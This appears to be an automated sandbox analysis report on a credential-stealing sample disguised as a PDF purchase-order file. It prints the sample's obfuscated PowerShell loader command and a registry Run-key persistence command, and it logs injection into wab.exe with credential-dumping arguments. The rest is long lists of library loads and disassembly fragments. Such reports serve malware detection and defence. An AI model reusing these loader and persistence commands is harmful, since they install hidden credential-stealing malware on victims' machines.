              Source: C:\Users\user\Desktop\P.O_Qouts_t87E90Y-E4R7G-PDF.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle minimized " $Fretum=Get-Content 'C:\Users\user\AppData\Local\Vandskellenes\Tramp\drejebnksvrktjets\Ravelproof29\Wabeno.phy';$Llebrdsbarmhjertighedens42=$Fretum.SubString(56238,3);.$Llebrdsbarmhjertighedens42($Fretum)"
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Risikofriestes% -windowstyle minimized $Follikler=(Get-ItemProperty -Path 'HKCU:\Reattach237\').Kkkenredskab;%Risikofriestes% ($Follikler)"
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Risikofriestes% -windowstyle minimized $Follikler=(Get-ItemProperty -Path 'HKCU:\Reattach237\').Kkkenredskab;%Risikofriestes% ($Follikler)"
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\vcrnmdjhacaz"
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\fwegnvuioksemqa"
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\iykqoofccsljowohdo"
              Source: C:\Users\user\Desktop\P.O_Qouts_t87E90Y-E4R7G-PDF.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle minimized " $Fretum=Get-Content 'C:\Users\user\AppData\Local\Vandskellenes\Tramp\drejebnksvrktjets\Ravelproof29\Wabeno.phy';$Llebrdsbarmhjertighedens42=$Fretum.SubString(56238,3);.$Llebrdsbarmhjertighedens42($Fretum)" Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Risikofriestes% -windowstyle minimized $Follikler=(Get-ItemProperty -Path 'HKCU:\Reattach237\').Kkkenredskab;%Risikofriestes% ($Follikler)"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\vcrnmdjhacaz"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\fwegnvuioksemqa"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\iykqoofccsljowohdo"Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Risikofriestes% -windowstyle minimized $Follikler=(Get-ItemProperty -Path 'HKCU:\Reattach237\').Kkkenredskab;%Risikofriestes% ($Follikler)"Jump to behavior
              Source: C:\Users\user\Desktop\P.O_Qouts_t87E90Y-E4R7G-PDF.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\P.O_Qouts_t87E90Y-E4R7G-PDF.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\Desktop\P.O_Qouts_t87E90Y-E4R7G-PDF.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\P.O_Qouts_t87E90Y-E4R7G-PDF.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Users\user\Desktop\P.O_Qouts_t87E90Y-E4R7G-PDF.exeSection loaded: dwmapi.dllJump to behavior
              Source: C:\Users\user\Desktop\P.O_Qouts_t87E90Y-E4R7G-PDF.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\P.O_Qouts_t87E90Y-E4R7G-PDF.exeSection loaded: oleacc.dllJump to behavior
              Source: C:\Users\user\Desktop\P.O_Qouts_t87E90Y-E4R7G-PDF.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Users\user\Desktop\P.O_Qouts_t87E90Y-E4R7G-PDF.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\P.O_Qouts_t87E90Y-E4R7G-PDF.exeSection loaded: shfolder.dllJump to behavior
              Source: C:\Users\user\Desktop\P.O_Qouts_t87E90Y-E4R7G-PDF.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\P.O_Qouts_t87E90Y-E4R7G-PDF.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\P.O_Qouts_t87E90Y-E4R7G-PDF.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\P.O_Qouts_t87E90Y-E4R7G-PDF.exeSection loaded: riched20.dllJump to behavior
              Source: C:\Users\user\Desktop\P.O_Qouts_t87E90Y-E4R7G-PDF.exeSection loaded: usp10.dllJump to behavior
              Source: C:\Users\user\Desktop\P.O_Qouts_t87E90Y-E4R7G-PDF.exeSection loaded: msls31.dllJump to behavior
              Source: C:\Users\user\Desktop\P.O_Qouts_t87E90Y-E4R7G-PDF.exeSection loaded: textinputframework.dllJump to behavior
              Source: C:\Users\user\Desktop\P.O_Qouts_t87E90Y-E4R7G-PDF.exeSection loaded: coreuicomponents.dllJump to behavior
              Source: C:\Users\user\Desktop\P.O_Qouts_t87E90Y-E4R7G-PDF.exeSection loaded: coremessaging.dllJump to behavior
              Source: C:\Users\user\Desktop\P.O_Qouts_t87E90Y-E4R7G-PDF.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\Desktop\P.O_Qouts_t87E90Y-E4R7G-PDF.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\Desktop\P.O_Qouts_t87E90Y-E4R7G-PDF.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\Desktop\P.O_Qouts_t87E90Y-E4R7G-PDF.exeSection loaded: textshaping.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: slc.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rstrtmgr.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: version.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: pstorec.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: vaultcli.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: pstorec.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\P.O_Qouts_t87E90Y-E4R7G-PDF.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
              Source: C:\Users\user\Desktop\P.O_Qouts_t87E90Y-E4R7G-PDF.exeFile written: C:\Users\user\AppData\Local\Vandskellenes\Tramp\drejebnksvrktjets\Ravelproof29\between.iniJump to behavior
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\AccountsJump to behavior
              Source: P.O_Qouts_t87E90Y-E4R7G-PDF.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
              Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb'< source: powershell.exe, 00000002.00000002.3166817817.0000000008A80000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb5 source: powershell.exe, 00000002.00000002.3164302379.00000000078D9000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: stem.Core.pdb-C source: powershell.exe, 00000002.00000002.3166817817.0000000008A80000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: %]qm.Core.pdb6? source: powershell.exe, 00000002.00000002.3166817817.0000000008A80000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.Core.pdb source: powershell.exe, 00000002.00000002.3164302379.00000000078D9000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb52 source: powershell.exe, 00000002.00000002.3164302379.00000000078D9000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: CallSite.Targetore.pdb source: powershell.exe, 00000002.00000002.3164302379.0000000007975000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.Core.pdbk source: powershell.exe, 00000002.00000002.3164302379.00000000078D9000.00000004.00000020.00020000.00000000.sdmp

              Data Obfuscation

              barindex
              Source: Yara matchFile source: 00000002.00000002.3167388642.000000000BD84000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer((Selvstndig $clockgenerator $Tidsforlb), (Lactoside @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Unfittingness = [AppDomain]::CurrentDomain.GetAssemblies
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Valutaenhedens)), $Scenarium).DefineDynamicModule($Reavoidance, $false).DefineType($Unflaked238, $Unhermitically, [System.MulticastDel
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_004044A4 LoadLibraryW,GetProcAddress,FreeLibrary,MessageBoxW,13_2_004044A4
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_093E2449 push 00000070h; ret 2_2_093E2453
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_093E2C97 pushfd ; ret 2_2_093E2CA3
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_093E477D push A5C28869h; iretd 2_2_093E4782
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_093E578D push esi; retf 2_2_093E5799
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_093E8781 push cs; ret 2_2_093E8794
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_093E621E push edi; ret 2_2_093E6225
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_23DD1219 push esp; iretd 9_2_23DD121A
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_23DC2806 push ecx; ret 9_2_23DC2819
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_03FC578D push esi; retf 9_2_03FC5799
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_03FC8781 push cs; ret 9_2_03FC8794
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_03FC477D push A5C28869h; iretd 9_2_03FC4782
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_03FC2C97 pushfd ; ret 9_2_03FC2CA3
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_03FC2449 push 00000070h; ret 9_2_03FC2453
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_03FC621E push edi; ret 9_2_03FC6225
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_0044693D push ecx; ret 13_2_0044694D
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_0044DB70 push eax; ret 13_2_0044DB84
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_0044DB70 push eax; ret 13_2_0044DBAC
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_00451D54 push eax; ret 13_2_00451D61
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 14_2_0044B090 push eax; ret 14_2_0044B0A4
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 14_2_0044B090 push eax; ret 14_2_0044B0CC
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 14_2_00451D34 push eax; ret 14_2_00451D41
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 14_2_00444E71 push ecx; ret 14_2_00444E81
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_00414060 push eax; ret 15_2_00414074
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_00414060 push eax; ret 15_2_0041409C
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_00414039 push ecx; ret 15_2_00414049
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_004164EB push 0000006Ah; retf 15_2_004165C4
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_00416553 push 0000006Ah; retf 15_2_004165C4
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_00416555 push 0000006Ah; retf 15_2_004165C4
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Vandskellenes\Tramp\drejebnksvrktjets\Intervisibility\P.O_Qouts_t87E90Y-E4R7G-PDF.exeJump to dropped file
              Source: C:\Users\user\Desktop\P.O_Qouts_t87E90Y-E4R7G-PDF.exeFile created: C:\Users\user\AppData\Local\Temp\nsw96B9.tmp\nsDialogs.dllJump to dropped file
              Source: C:\Windows\SysWOW64\reg.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Startup keyJump to behavior
              Source: C:\Windows\SysWOW64\reg.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Startup keyJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 14_2_004047CB LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,14_2_004047CB
              Source: C:\Users\user\Desktop\P.O_Qouts_t87E90Y-E4R7G-PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
